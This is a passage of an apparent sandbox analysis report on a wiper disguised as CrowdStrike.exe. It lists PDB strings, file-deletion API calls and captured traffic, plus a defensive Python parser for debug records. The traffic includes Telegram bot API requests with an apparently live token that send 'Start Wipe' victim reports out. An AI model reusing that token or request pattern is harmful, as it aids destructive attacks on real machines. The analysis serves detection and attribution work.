        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qLC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q}C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qxC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdbt source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qXC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qGC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qvC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qwC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
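The PDB strings above are a debugger's symbol-store layout once it lands in process memory: `<pdb name>\<GUID as 32 hex digits><age in hex>\<pdb name>`, derived from the CodeView RSDS record the linker writes into a PE. The one path that is not a symbol-store entry, the `SecureDeleteFilesConsole.pdb` build path under `obj\Debug`, is the attribution-relevant string. The following Python is an added example, not code from Joe Sandbox or from the sample, showing how to pull RSDS records out of a dump and reproduce that key. The blob it scans is constructed here: the first GUID is invented, the second is the GUID/age pair read back from the `winload_prod.pdb` path above.

```python
import struct
import uuid

# Added example (not Joe Sandbox or sample code): parse CodeView "RSDS" records and derive the
# symbol-store key behind paths like winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb


def build_rsds(guid: uuid.UUID, age: int, pdb_path: str) -> bytes:
    """Assemble an RSDS record: magic, GUID in Windows (mixed-endian) layout, little-endian age, NUL-terminated path."""
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + pdb_path.encode("utf-8") + b"\x00"


def parse_rsds_at(blob: bytes, off: int) -> dict:
    """Decode the RSDS record starting at offset `off` (caller guarantees the magic is there)."""
    guid = uuid.UUID(bytes_le=blob[off + 4:off + 20])
    (age,) = struct.unpack_from("<I", blob, off + 20)
    end = blob.find(b"\x00", off + 24)
    if end < 0:
        end = len(blob)
    path = blob[off + 24:end].decode("utf-8", "replace")
    pdb_name = path.replace("\\", "/").rsplit("/", 1)[-1]
    # Symbol-server key: 32 uppercase hex digits of the GUID followed by the age in hex, no padding.
    key = f"{guid.hex.upper()}{age:X}"
    return {
        "offset": off,
        "guid": str(guid),
        "age": age,
        "pdb_path": path,
        "pdb_name": pdb_name,
        "symstore_key": key,
        "symstore_path": f"{pdb_name}\\{key}\\{pdb_name}",
    }


def find_rsds_records(blob: bytes) -> list:
    """Scan a memory dump or file for every RSDS record. A false hit on the 4-byte magic is possible
    in arbitrary data; a PE-aware tool would walk the debug directory instead of scanning."""
    records, off = [], blob.find(b"RSDS")
    while off >= 0:
        if off + 24 <= len(blob):
            records.append(parse_rsds_at(blob, off))
        off = blob.find(b"RSDS", off + 4)
    return records


def is_developer_build_path(pdb_path: str) -> bool:
    """Heuristic: MSBuild intermediate directories (obj\\Debug, obj\\Release) mark a developer's own
    build output rather than a symbol-store path, which is what makes the string useful for attribution."""
    lowered = pdb_path.lower().replace("/", "\\")
    return "\\obj\\debug\\" in lowered or "\\obj\\release\\" in lowered


# Constructed sample blob with two records. The first GUID is made up; the second GUID/age pair is the
# one encoded in the winload_prod.pdb symbol-store path seen in the strings above.
SAMPLE_BLOB = (
    b"\x00" * 16
    + build_rsds(
        uuid.UUID("12345678-9abc-def0-1234-56789abcdef0"), 1,
        r"G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdb",
    )
    + b"\xcc" * 8
    + build_rsds(uuid.UUID("01ab9056-ea93-80f7-1644-c4339e3fa1ac"), 2, "winload_prod.pdb")
)


if __name__ == "__main__":
    for rec in find_rsds_records(SAMPLE_BLOB):
        tag = "developer build" if is_developer_build_path(rec["pdb_path"]) else "symbol-store name"
        print(f"{rec['symstore_key']}  {rec['pdb_path']}  [{tag}]")
```

Run against a process dump of the injected RegAsm.exe, the developer-build hit is the one worth keeping in the case file; the symbol-store paths only say that a debugger helper tried to fetch Windows kernel symbols.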

        Networking

        Source: unknown | DNS query: name: api.telegram.org
        Source: global traffic | HTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
        Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox View | IP Address: 104.16.185.241 104.16.185.241
        Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown | DNS query: name: icanhazip.com
        Source: unknown | DNS query: name: icanhazip.com
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | DNS traffic detected: DNS query: XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT
        Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
        Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
        Source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com
        Source: RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/
        Source: CrowdStrike.exe, 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp, CrowdStrike.exe, 00000000.00000000.1686299423.0000000000408000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
        Source: CrowdStrike.exe, 00000000.00000003.1696924451.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Champion.pif, 0000000A.00000000.1733135442.0000000000EA9000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
